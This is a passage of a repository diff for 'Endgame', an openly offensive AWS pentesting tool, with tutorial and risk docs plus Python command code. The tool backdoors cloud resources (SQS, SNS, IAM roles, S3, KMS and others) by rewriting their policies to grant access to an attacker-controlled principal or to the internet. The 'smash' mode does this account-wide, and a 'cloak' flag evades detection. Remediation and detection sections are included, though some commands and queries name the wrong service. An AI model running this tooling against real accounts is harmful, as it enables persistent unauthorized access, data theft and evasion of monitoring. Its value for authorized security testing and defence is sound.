"Sid": "Endgame",
"Effect": "Allow",
"Principal": {
"AWS": "999988887777"
},
"Action": [
"SNS:AddPermission",
"SNS:DeleteTopic",
"SNS:GetTopicAttributes",
"SNS:ListSubscriptionsByTopic",
"SNS:Publish",
"SNS:Receive",
"SNS:RemovePermission",
"SNS:SetTopicAttributes",
"SNS:Subscribe"
],
"Resource": "arn:aws:sns:us-east-1:111122223333:test-resource-exposure"
}
]
}
```
## Exploitation
```
TODO
```
## Remediation
* **Trusted Accounts Only**: Ensure that SNS Topics are only shared with trusted accounts, and that the trusted accounts truly need access to the SNS Topic.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **AWS Access Analyzer**: Leverage AWS Access Analyzer to report on external access to SNS Topics. See [the AWS Access Analyzer documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html) for more details.
* **Restrict access to IAM permissions that could lead to exposure of your SNS Topics**: Tightly control access to the following IAM actions:
- [sns:AddPermission](https://docs.aws.amazon.com/sns/latest/api/API_AddPermission.html): _Adds a statement to a topic's access control policy, granting access for the specified AWS accounts to the specified actions._
- [sns:RemovePermission](https://docs.aws.amazon.com/sns/latest/api/API_RemovePermission.html): _Removes a statement from a topic's access control policy._
- [sns:GetTopicAttributes](https://docs.aws.amazon.com/sns/latest/api/API_GetTopicAttributes.html): _Returns all of the properties of a topic. This includes the resource-based policy document for the SNS Topic, which lists information about who is authorized to access the SNS Topic_
- [sns:ListTopics](https://docs.aws.amazon.com/sns/latest/api/API_ListTopics.html): _Returns a list of the requester's topics._
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='ses.amazonaws.com' AND (eventName='PutIdentityPolicy' or eventName='DeleteIdentityPolicy')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [add-permission](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sns/add-permission.html)

75
docs/risks/sqs.md Normal file
View File

@ -0,0 +1,75 @@
# SQS Queues
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service iam --name test-resource-exposure
```
* To verify that the SQS queue has been shared with a rogue user, run the following from the victim account:
```bash
export QUEUE_URL=(`aws sqs get-queue-url --queue-name test-resource-exposure | jq -r '.QueueUrl'`)
aws sqs get-queue-attributes --queue-url $QUEUE_URL --attribute-names Policy
```
* Observe that the contents match the example shown below.
## Example
The policy below allows the Evil Principal's account ID (`999988887777` access to `sqs:*` to the victim resource (`arn:aws:sqs:us-east-1:111122223333:test-resource-exposure`), indicating a successful compromise.
```json
{
"Attributes": {
"Policy": "{\"Version\":\"2008-10-17\",\"Id\":\"arn:aws:sqs:us-east-1:111122223333:test-resource-exposure/SQSDefaultPolicy\",\"Statement\":[{\"Sid\":\"AllowCurrentAccount\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::111122223333:root\"},\"Action\":\"SQS:*\",\"Resource\":\"arn:aws:sqs:us-east-1:111122223333:test-resource-exposure\"},{\"Sid\":\"Endgame\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:root\"},\"Action\":\"SQS:*\",\"Resource\":\"arn:aws:sqs:us-east-1:111122223333:test-resource-exposure\"}]}"
}
}
```
## Exploitation
```
TODO
```
## Remediation
* **Trusted Accounts Only**: Ensure that SQS Queues are only shared with trusted accounts, and that the trusted accounts truly need access to the SQS Queue.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **AWS Access Analyzer**: Leverage AWS Access Analyzer to report on external access to SQS Queues. See [the AWS Access Analyzer documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html) for more details.
* **Restrict access to IAM permissions that could lead to exposure of your SQS Queues**: Tightly control access to the following IAM actions:
- [sqs:AddPermission](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/APIReference/API_AddPermission.html): _Adds a permission to a queue for a specific principal._
- [sqs:RemovePermission](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/APIReference/API_RemovePermission.html): _Revokes any permissions in the queue policy that matches the specified Label parameter._
- [sqs:GetQueueAttributes](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/APIReference/API_GetQueueAttributes.html): _Gets attributes for the specified queue. This includes retrieving the list of principals who are authorized to access the queue._
- [sqs:GetQueueUrl](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/APIReference/API_GetQueueUrl.html): _Returns the URL of an existing queue._
- [sqs:ListQueues](https://docs.aws.amazon.com/AWSSimpleQueueService/latest/APIReference/API_ListQueues.html): _Returns a list of your queues._
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='sqs.amazonaws.com' AND (eventName='AddPermission' or eventName='RemovePermission')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [aws sqs add-permission](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sqs/add-permission.html)
* [aws sqs get-queue-attributes](https://docs.aws.amazon.com/cli/latest/reference/sqs/get-queue-attributes.html)

100
docs/tutorial.md Normal file
View File

@ -0,0 +1,100 @@
# Tutorial
The prerequisite for an attacker running Endgame is they have access to AWS API credentials for the victim account which have privileges to update resource policies.
Endgame can run in two modes, `expose` or `smash`. The less-destructive `expose` mode is surgical, updating the resource policy on a single attacker-defined resource to include a back door to a principal they control (or the internet if they're mean).
`smash`, on the other hand, is more destructive (and louder). `smash` can run on a single service or all supported services. In either case, for each service it enumerates a list of resources in that region, reads the current resource policy on each, and applies a new policy which includes the "evil principal" the attacker has specified. The net effect of this is that depending on the privileges they have in the victim account, an attacker can insert dozens of back doors which are not controlled by the victim's IAM policies.
## Step 1: Setup
* First, authenticate to AWS CLI using credentials to the victim's account.
* Set the environment variables for `EVIL_PRINCIPAL` (required). Optionally, set the environment variables for `AWS_REGION` and `AWS_PROFILE`.
```bash
# Set `EVIL_PRINCIPAL` environment variable to the rogue IAM User or
# Role that you want to give access to.
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
# If you don't supply these values, these will be the defaults.
export AWS_REGION="us-east-1"
export AWS_PROFILE="default"
```
## Step 2: Create Demo Infrastructure
This program makes modifications to live AWS Infrastructure, which can vary from account to account. We have bootstrapped some of this for you using [Terraform](https://www.terraform.io/intro/index.html). **Note: This will create real AWS infrastructure and will cost you money.**
```bash
# To create the demo infrastructure
make terraform-demo
```
## Step 3: List Victim Resources
You can use the `list-resources` command to list resources in the account that you can backdoor.
* Examples:
```bash
# List IAM Roles, so you can create a backdoor via their AssumeRole policies
endgame list-resources -s iam
# List S3 buckets, so you can create a backdoor via their Bucket policies
endgame list-resources --service s3
# List all resources across services that can be backdoored
endgame list-resources --service all
```
## Step 4: Backdoor specific resources
* Use the `--dry-run` command first to test it without modifying anything:
```bash
endgame expose --service iam --name test-resource-exposure --dry-run
```
* To create the backdoor to that resource from your rogue account, run the following:
```bash
endgame expose --service iam --name test-resource-exposure
```
Example output:
![expose](images/add-myself-foreal.png)
## Step 5: Roll back changes
* If you want to atone for your sins (optional) you can use the `--undo` flag to roll back the changes.
```bash
endgame expose --service iam --name test-resource-exposure --undo
```
![expose undo](images/add-myself-undo.png)
## Step 6: Smash your AWS Account to Pieces
* To expose every exposable resource in your AWS account, run the following command.
> Warning: If you supply the argument `--evil-principal *` or the environment variable `EVIL_PRINCIPAL=*`, it will expose the account to the internet. If you do this, it is possible that an attacker could assume your privileged IAM roles, take over the other [supported resources](https://endgame.readthedocs.io/en/latest/#supported-backdoors) present in that account, or incur a massive bill. As such, you might want to set `--evil-principal` to your own AWS user/role in another account.
```bash
endgame smash --service all --dry-run
endgame smash --service all
endgame smash --service all --undo
```
## Step 7: Destroy Demo Infrastructure
* Now that you are done with the tutorial, don't forget to clean up the demo infrastructure.
```bash
# Destroy the demo infrastructure
make terraform-destroy
```

53
endgame/__init__.py Normal file
View File

@ -0,0 +1,53 @@
# pylint: disable=missing-module-docstring
import logging
from logging import NullHandler
# Set default handler when endgame is used as library to avoid "No handler found" warnings.
logging.getLogger(__name__).addHandler(NullHandler())
def set_stream_logger(name="endgame", level=logging.DEBUG, format_string=None):
"""
Add a stream handler for the given name and level to the logging module.
By default, this logs all endgame messages to ``stdout``.
>>> import endgame
>>> endgame.set_stream_logger('endgame.database.build', logging.INFO)
:type name: string
:param name: Log name
:type level: int
:param level: Logging level, e.g. ``logging.INFO``
:type format_string: str
:param format_string: Log message format
"""
# remove existing handlers. since NullHandler is added by default
handlers = logging.getLogger(name).handlers
for handler in handlers:
logging.getLogger(name).removeHandler(handler)
if format_string is None:
format_string = "%(asctime)s %(name)s [%(levelname)s] %(message)s"
logger = logging.getLogger(name)
logger.setLevel(level)
handler = logging.StreamHandler()
handler.setLevel(level)
formatter = logging.Formatter(format_string)
handler.setFormatter(formatter)
logger.addHandler(handler)
def set_log_level(verbose):
"""
Set Log Level based on click's count argument.
Default log level to critical; otherwise, set to: warning for -v, info for -vv, debug for -vvv
:param verbose: integer for verbosity count.
:return:
"""
if verbose == 1:
set_stream_logger(level=getattr(logging, "WARNING"))
elif verbose == 2:
set_stream_logger(level=getattr(logging, "INFO"))
elif verbose >= 3:
set_stream_logger(level=getattr(logging, "DEBUG"))
else:
set_stream_logger(level=getattr(logging, "CRITICAL"))

0
endgame/bin/__init__.py Normal file
View File

28
endgame/bin/cli.py Normal file
View File

@ -0,0 +1,28 @@
#! /usr/bin/env python
import click
from endgame import command
from endgame.bin.version import __version__
@click.group()
@click.version_option(version=__version__)
def endgame():
"""
An AWS Pentesting tool that lets you use one-liner commands to backdoor an AWS account's resources with a rogue AWS account - or share the resources with the entire internet 😈
"""
endgame.add_command(command.list_resources.list_resources)
endgame.add_command(command.expose.expose)
endgame.add_command(command.smash.smash)
def main():
"""
An AWS Pentesting tool that lets you use one-liner commands to backdoor an AWS account's resources with a rogue AWS account - or share the resources with the entire internet 😈
"""
endgame()
if __name__ == "__main__":
main()

1
endgame/bin/version.py Normal file
View File

@ -0,0 +1 @@
__version__ = "0.2.0"

View File

@ -0,0 +1,3 @@
from endgame.command import list_resources
from endgame.command import expose
from endgame.command import smash

240
endgame/command/expose.py Normal file
View File

@ -0,0 +1,240 @@
"""
Expose AWS resources
"""
import json
import logging
import click
import boto3
from policy_sentry.util.arns import (
parse_arn_for_resource_type,
get_resource_path_from_arn,
)
from endgame import set_log_level
from endgame.exposure_via_resource_policies import glacier_vault, sqs, lambda_layer, lambda_function, kms, cloudwatch_logs, efs, s3, \
sns, iam, ecr, secrets_manager, ses, elasticsearch, acm_pca
from endgame.exposure_via_sharing_apis import rds_snapshots, ebs_snapshots, ec2_amis
from endgame.shared.aws_login import get_boto3_client, get_current_account_id
from endgame.shared import constants, utils
from endgame.shared.validate import (
click_validate_supported_aws_service,
click_validate_user_or_principal_arn,
)
from endgame.shared.response_message import ResponseMessage
logger = logging.getLogger(__name__)
END = "\033[0m"
GREY = "\33[90m"
CBLINK = '\33[5m'
CBLINK2 = '\33[6m'
@click.command(name="expose", short_help="Surgically expose resources by modifying resource policies to include backdoors to a rogue attacker-controlled IAM principal or to the internet.")
@click.option(
"--name",
"-n",
type=str,
required=True,
help="Specify the name of your resource",
)
@click.option(
"--evil-principal",
"-e",
type=str,
required=True,
help="Specify the name of your resource",
callback=click_validate_user_or_principal_arn,
envvar="EVIL_PRINCIPAL"
)
@click.option(
"--profile",
"-p",
type=str,
required=False,
help="Specify the AWS IAM profile.",
envvar="AWS_PROFILE"
)
@click.option(
"--service",
"-s",
type=click.Choice(constants.SUPPORTED_AWS_SERVICES),
required=False,
help="The AWS service in question",
callback=click_validate_supported_aws_service,
)
@click.option(
"--region",
"-r",
type=str,
required=False,
default="us-east-1",
help="The AWS region",
envvar="AWS_REGION"
)
@click.option(
"--dry-run",
"-d",
is_flag=True,
default=False,
help="Dry run, no modifications",
)
@click.option(
"--undo",
"-u",
is_flag=True,
default=False,
help="Undo the previous modifications and leave no trace",
)
@click.option(
"--cloak",
"-c",
is_flag=True,
default=False,
help="Evade detection by using the default AWS SDK user agent instead of one that indicates usage of this tool.",
)
@click.option(
"-v",
"--verbose",
"verbosity",
count=True,
)
def expose(name, evil_principal, profile, service, region, dry_run, undo, cloak, verbosity):
"""
Surgically expose resources by modifying resource policies to include backdoors to a rogue attacker-controlled IAM principal or to the internet.
:param name: The name of the AWS resource.
:param evil_principal: The ARN of the evil principal to give access to the resource.
:param profile: The AWS profile, if using the shared credentials file.
:param service: The AWS Service in question.
:param region: The AWS region. Defaults to us-east-1
:param dry_run: Dry run, no modifications
:param undo: Undo the previous modifications and leave no trace
:param cloak: Evade detection by using the default AWS SDK user agent instead of one that indicates usage of this tool.
:param verbosity: Set log verbosity.
:return:
"""
set_log_level(verbosity)
# User-supplied arguments like `cloudwatch` need to be translated to the IAM name like `logs`
provided_service = service
service = utils.get_service_translation(provided_service=service)
# Get Boto3 clients
client = get_boto3_client(profile=profile, service=service, region=region, cloak=cloak)
sts_client = get_boto3_client(profile=profile, service="sts", region=region, cloak=cloak)
# Get the current account ID
current_account_id = get_current_account_id(sts_client=sts_client)
if evil_principal.strip('"').strip("'") == "*":
principal_type = "internet-wide access"
principal_name = "*"
else:
principal_type = parse_arn_for_resource_type(evil_principal)
principal_name = get_resource_path_from_arn(evil_principal)
response_message = expose_service(provided_service=provided_service, region=region, name=name, current_account_id=current_account_id, client=client, dry_run=dry_run, evil_principal=evil_principal, undo=undo)
if undo and not dry_run:
utils.print_remove(response_message.service, response_message.resource_type, response_message.resource_name,
principal_type, principal_name, success=response_message.success)
elif undo and dry_run:
utils.print_remove(response_message.service, response_message.resource_type, response_message.resource_name,
principal_type, principal_name, success=response_message.success)
elif not undo and dry_run:
utils.print_add(response_message.service, response_message.resource_type, response_message.resource_name,
principal_type, principal_name, success=response_message.success)
else:
utils.print_add(response_message.service, response_message.resource_type, response_message.resource_name,
principal_type, principal_name, success=response_message.success)
if verbosity >= 1:
print_diff_messages(response_message=response_message, verbosity=verbosity)
def expose_service(
provided_service: str,
region: str,
name: str,
current_account_id: str,
client: boto3.Session.client,
undo: bool,
dry_run: bool,
evil_principal: str
) -> ResponseMessage:
"""Expose a resource from an AWS Service. You can call this function directly."""
service = provided_service
resource = None
# fmt: off
if service == "acm-pca":
resource = acm_pca.AcmPrivateCertificateAuthority(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "ecr":
resource = ecr.EcrRepository(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "efs" or service == "elasticfilesystem":
resource = efs.ElasticFileSystem(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "elasticsearch" or service == "es":
resource = elasticsearch.ElasticSearchDomain(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "glacier":
resource = glacier_vault.GlacierVault(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "iam":
resource = iam.IAMRole(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "kms":
resource = kms.KmsKey(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "lambda":
resource = lambda_function.LambdaFunction(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "lambda-layer":
resource = lambda_layer.LambdaLayer(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "logs" or service == "cloudwatch":
resource = cloudwatch_logs.CloudwatchResourcePolicy(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "s3":
resource = s3.S3Bucket(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "secretsmanager":
resource = secrets_manager.SecretsManagerSecret(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "ses":
resource = ses.SesIdentityPolicy(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "sns":
resource = sns.SnsTopic(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "sqs":
resource = sqs.SqsQueue(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "rds":
resource = rds_snapshots.RdsSnapshot(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "ebs":
resource = ebs_snapshots.EbsSnapshot(name=name, client=client, current_account_id=current_account_id, region=region)
elif service == "ec2-ami":
resource = ec2_amis.Ec2Image(name=name, client=client, current_account_id=current_account_id, region=region)
# fmt: on
if undo and not dry_run:
response_message = resource.undo(evil_principal=evil_principal)
elif dry_run and not undo:
response_message = resource.add_myself(evil_principal=evil_principal, dry_run=dry_run)
elif dry_run and undo:
response_message = resource.undo(evil_principal=evil_principal, dry_run=dry_run)
else:
response_message = resource.add_myself(evil_principal=evil_principal, dry_run=False)
return response_message
def print_diff_messages(response_message: ResponseMessage, verbosity: int):
if verbosity >= 2:
utils.print_grey(f"Old statement IDs: {response_message.original_policy_sids}")
utils.print_grey(f"Updated statement IDs: {response_message.updated_policy_sids}")
# TODO: This output format works for exposure_via_resource_policies, not necessarily for exposure_via_sharing_apis.
if response_message.added_sids:
logger.debug("Statements are being added")
diff = response_message.added_sids
utils.print_yellow(f"\t+ Resource: {response_message.victim_resource_arn}")
utils.print_green(f"\t++ (New statements): {', '.join(diff)}")
utils.print_green(f"\t++ (Evil Principal): {response_message.evil_principal}")
elif len(response_message.updated_policy_sids) == len(response_message.original_policy_sids):
utils.print_yellow(f"\t* Resource: {response_message.victim_resource_arn}")
utils.print_yellow(f"\t** (No new statements)")
else:
logger.debug("Statements are being removed")
diff = response_message.removed_sids
utils.print_yellow(f"\t- Resource: {response_message.victim_resource_arn}")
utils.print_red(f"\t-- Statements being removed: {', '.join(diff)}")
if verbosity >= 3:
utils.print_grey("Original policy:")
utils.print_grey(json.dumps(response_message.original_policy))
utils.print_grey("New policy:")
utils.print_grey(json.dumps(response_message.updated_policy))

View File

@ -0,0 +1,124 @@
"""
List exposable resources
"""
import logging
import click
from endgame import set_log_level
from endgame.shared.aws_login import get_boto3_client, get_current_account_id
from endgame.shared.validate import click_validate_supported_aws_service, click_validate_comma_separated_resource_names, \
click_validate_comma_separated_excluded_services
from endgame.shared.resource_results import ResourceResults
from endgame.shared import constants
logger = logging.getLogger(__name__)
@click.command(name="list-resources", short_help="List all resources that can be exposed via Endgame.")
@click.option(
"--service",
"-s",
type=str,
required=True,
help=f"The AWS service in question. Valid arguments: {', '.join(constants.SUPPORTED_AWS_SERVICES)}",
callback=click_validate_supported_aws_service,
)
@click.option(
"--profile",
"-p",
type=str,
required=False,
help="Specify the AWS IAM profile.",
envvar="AWS_PROFILE"
)
@click.option(
"--region",
"-r",
type=str,
required=False,
default="us-east-1",
help="The AWS region. Set to 'all' to iterate through all regions.",
envvar="AWS_REGION"
)
@click.option(
"--cloak",
"-c",
is_flag=True,
default=False,
help="Evade detection by using the default AWS SDK user agent instead of one that indicates usage of this tool.",
)
@click.option(
"--exclude",
"-e",
"excluded_names",
type=str,
default="",
help="A comma-separated list of resource names to exclude from results",
envvar="EXCLUDED_NAMES",
callback=click_validate_comma_separated_resource_names
)
@click.option(
"--excluded-services",
type=str,
default="",
help="A comma-separated list of services to exclude from results",
envvar="EXCLUDED_SERVICES",
callback=click_validate_comma_separated_resource_names
)
@click.option(
"-v",
"--verbose",
"verbosity",
count=True,
)
def list_resources(service, profile, region, cloak, excluded_names, excluded_services, verbosity):
"""
List AWS resources to expose.
"""
set_log_level(verbosity)
# User-supplied arguments like `cloudwatch` need to be translated to the IAM name like `logs`
user_provided_service = service
# Get the boto3 clients
sts_client = get_boto3_client(profile=profile, service="sts", region="us-east-1", cloak=cloak)
current_account_id = get_current_account_id(sts_client=sts_client)
if user_provided_service == "all" and region == "all":
logger.critical("'--service all' and '--region all' detected; listing all resources across all services in the "
"account. This might take a while - about 5 minutes.")
elif region == "all":
logger.debug("'--region all' selected; listing resources across the entire account, so this might take a while")
else:
pass
if user_provided_service == "all":
logger.debug("'--service all' selected; listing resources in ARN format to differentiate between services")
resource_results = ResourceResults(
user_provided_service=user_provided_service,
user_provided_region=region,
current_account_id=current_account_id,
profile=profile,
cloak=cloak,
excluded_names=excluded_names,
excluded_services=excluded_services
)
results = resource_results.resources
# Print the results
if len(results) == 0:
logger.warning("There are no resources given the criteria provided.")
else:
# If you provide --service all, then we will list the ARNs to differentiate services
if user_provided_service == "all":
logger.debug("'--service all' selected; listing resources in ARN format to differentiate between services")
for resource in results:
if resource.name not in excluded_names:
print(resource.arn)
else:
logger.debug(f"Excluded: {resource.name}")
else:
logger.debug("Listing resources by name")
for resource in results:
if resource.name not in excluded_names:
print(resource.name)
else:
logger.debug(f"Excluded: {resource.name}")

191
endgame/command/smash.py Normal file
View File

@ -0,0 +1,191 @@
"""
Smash your AWS Account to pieces by exposing massive amounts of resources to a rogue principal or to the internet
"""
import logging
import click
import boto3
from policy_sentry.util.arns import (
parse_arn_for_resource_type,
get_resource_path_from_arn,
)
from endgame import set_log_level
from endgame.shared.aws_login import get_boto3_client, get_current_account_id
from endgame.shared.validate import click_validate_supported_aws_service, click_validate_user_or_principal_arn, click_validate_comma_separated_resource_names
from endgame.shared import utils, constants, scary_warnings
from endgame.shared.resource_results import ResourceResults
from endgame.command.expose import expose_service
from endgame.shared.response_message import ResponseMessage
logger = logging.getLogger(__name__)
END = "\033[0m"
@click.command(name="smash", short_help="Smash your AWS Account to pieces by exposing massive amounts of resources to a"
" rogue principal or to the internet")
@click.option(
"--service",
"-s",
type=str,
required=True,
help=f"The AWS service in question. Valid arguments: {', '.join(constants.SUPPORTED_AWS_SERVICES)}",
callback=click_validate_supported_aws_service,
)
@click.option(
"--evil-principal",
"-e",
type=str,
required=True,
help="Specify the name of your resource",
callback=click_validate_user_or_principal_arn,
envvar="EVIL_PRINCIPAL"
)
@click.option(
"--profile",
"-p",
type=str,
required=False,
help="Specify the AWS IAM profile.",
envvar="AWS_PROFILE"
)
@click.option(
"--region",
"-r",
type=str,
required=False,
default="us-east-1",
help="The AWS region. Set to 'all' to iterate through all regions.",
envvar="AWS_REGION"
)
@click.option(
"--dry-run",
"-d",
is_flag=True,
default=False,
help="Dry run, no modifications",
)
@click.option(
"--undo",
"-u",
is_flag=True,
default=False,
help="Undo the previous modifications and leave no trace",
)
@click.option(
"--cloak",
"-c",
is_flag=True,
default=False,
help="Evade detection by using the default AWS SDK user agent instead of one that indicates usage of this tool.",
)
@click.option(
"--exclude",
"-e",
"excluded_names",
type=str,
default="",
help="A comma-separated list of resource names to exclude from results",
envvar="EXCLUDED_NAMES",
callback=click_validate_comma_separated_resource_names
)
@click.option(
"--excluded-services",
type=str,
default="",
help="A comma-separated list of services to exclude from results",
envvar="EXCLUDED_SERVICES",
callback=click_validate_comma_separated_resource_names
)
@click.option(
"-v",
"--verbose",
"verbosity",
count=True,
)
def smash(service, evil_principal, profile, region, dry_run, undo, cloak, excluded_names, excluded_services, verbosity):
"""
Smash your AWS Account to pieces by exposing massive amounts of resources to a rogue principal or to the internet
"""
set_log_level(verbosity)
# Get the current account ID
sts_client = get_boto3_client(profile=profile, service="sts", region="us-east-1", cloak=cloak)
current_account_id = get_current_account_id(sts_client=sts_client)
if evil_principal.strip('"').strip("'") == "*":
if not scary_warnings.confirm_anonymous_principal():
utils.print_red("User cancelled, exiting")
exit()
else:
print()
principal_type = "internet-wide access"
principal_name = "*"
else:
principal_type = parse_arn_for_resource_type(evil_principal)
principal_name = get_resource_path_from_arn(evil_principal)
results = []
user_provided_service = service
if user_provided_service == "all" and region == "all":
utils.print_red("--service all and --region all detected; listing all resources across all services in the "
"account. This might take a while - about 5 minutes.")
elif region == "all":
logger.debug("'--region all' selected; listing resources across the entire account, so this might take a while")
else:
pass
if user_provided_service == "all":
logger.debug("'--service all' selected; listing resources in ARN format to differentiate between services")
resource_results = ResourceResults(
user_provided_service=user_provided_service,
user_provided_region=region,
current_account_id=current_account_id,
profile=profile,
cloak=cloak,
excluded_names=excluded_names,
excluded_services=excluded_services
)
results = resource_results.resources
if undo and not dry_run:
utils.print_green("UNDO BACKDOOR:")
elif dry_run and not undo:
utils.print_red("CREATE BACKDOOR (DRY RUN):")
elif dry_run and undo:
utils.print_green("UNDO BACKDOOR (DRY RUN):")
else:
utils.print_red("CREATE_BACKDOOR:")
for resource in results:
if resource.name not in excluded_names:
# feed the name, region, and translated_service based on what it is for each resource
name = resource.name
region = resource.region
translated_service = utils.get_service_translation(provided_service=resource.service)
client = get_boto3_client(profile=profile, service=translated_service, region=region, cloak=cloak)
response_message = smash_resource(service=resource.service, region=region, name=name,
current_account_id=current_account_id,
client=client, undo=undo, dry_run=dry_run, evil_principal=evil_principal)
if undo and not dry_run:
utils.print_remove(response_message.service, response_message.resource_type, response_message.resource_name, principal_type, principal_name, success=response_message.success)
elif undo and dry_run:
utils.print_remove(response_message.service, response_message.resource_type, response_message.resource_name, principal_type, principal_name, success=response_message.success)
elif not undo and dry_run:
utils.print_add(response_message.service, response_message.resource_type, response_message.resource_name, principal_type, principal_name, success=response_message.success)
else:
utils.print_add(response_message.service, response_message.resource_type, response_message.resource_name, principal_type, principal_name, success=response_message.success)
else:
logger.debug(f"Excluded: {resource.arn}")
def smash_resource(
service: str,
region: str,
name: str,
current_account_id: str,
client: boto3.Session.client,
undo: bool,
dry_run: bool,
evil_principal: str,
) -> ResponseMessage:
response_message = expose_service(provided_service=service, region=region, name=name,
current_account_id=current_account_id,
client=client, undo=undo, dry_run=dry_run, evil_principal=evil_principal)
return response_message

View File

@ -0,0 +1,18 @@
# Exposure via AWS RAM
By default, AWS RAM allows you to share resources with **any** AWS Account.
Supported resource types are listed in the AWS documentation [here](https://docs.aws.amazon.com/ram/latest/userguide/shareable.html).
## Status
This exploit method is not currently implemented. Please come back later when we've implemented it.
To get notified when it is available, you can take one of the following methods:
1. In GitHub, select "Watch for new releases"
2. Follow the author [@kmcquade](https://twitter.com/kmcquade3) on Twitter. He will announce when this feature is available 😃
## Remediation
While you are able to restrict resource sharing to your organization in AWS Organizations, the only way to disable it altogether if you don't want it is to use AWS Service Control Policies.

View File

View File

@ -0,0 +1,120 @@
# Resources that can be made public through resource policies
## Supported
### CloudWatch Logs
Actions:
- logs [put-resource-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/logs/put-resource-policy.html)
### ECR Repository
Actions:
- ecr [set-repository-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ecr/set-repository-policy.html)
### EFS
TODO: Need to confirm this can actually be shared with other accounts. Some of the doc wording leads me to think this might only be shareable to principals within an account.
Actions:
- efs [put-file-system-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/efs/put-file-system-policy.html)
### ElasticSearch
Actions:
- es [create-elasticsearch-domain](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/es/create-elasticsearch-domain.html)
- es [update-elasticsearch-domain-config](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/es/update-elasticsearch-domain-config.html)
### Glacier
Actions:
- glacier [set-vault-access-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/glacier/set-vault-access-policy.html)
### Lambda
Allows invoking the function
Actions:
- lambda [add-permission](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/add-permission.html)
### Lambda layer
Actions:
- lambda [add-layer-version-permission](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/add-layer-version-permission.html)
### IAM Role
Actions:
- iam [create-role](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/create-role.html)
- iam [update-assume-role-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/update-assume-role-policy.html)
### KMS Keys
Actions:
- kms [create-key](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/kms/create-key.html)
- kms [create-grant](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/kms/create-grant.html)
- kms [put-key-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/kms/put-key-policy.html)
### S3
S3 buckets can be public via policies and ACL. ACLs can be set at bucket or object creation.
Actions:
- s3api [create-bucket](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/create-bucket.html)
- s3api [put-bucket-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/put-bucket-policy.html)
- s3api [put-bucket-acl](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/put-bucket-acl.html)
### Secrets Managers
Actions:
- secretsmanager [put-resource-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/secretsmanager/put-resource-policy.html)
### SNS
Actions:
- sns [create-topic](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sns/create-topic.html)
- sns [add-permission](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sns/add-permission.html)
### SQS
Actions:
- sqs [create-queue](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sqs/create-queue.html)
- sqs [add-permission](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/sqs/add-permission.html)
### SES
[Docs](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/sending-authorization-policies.html)
Actions:
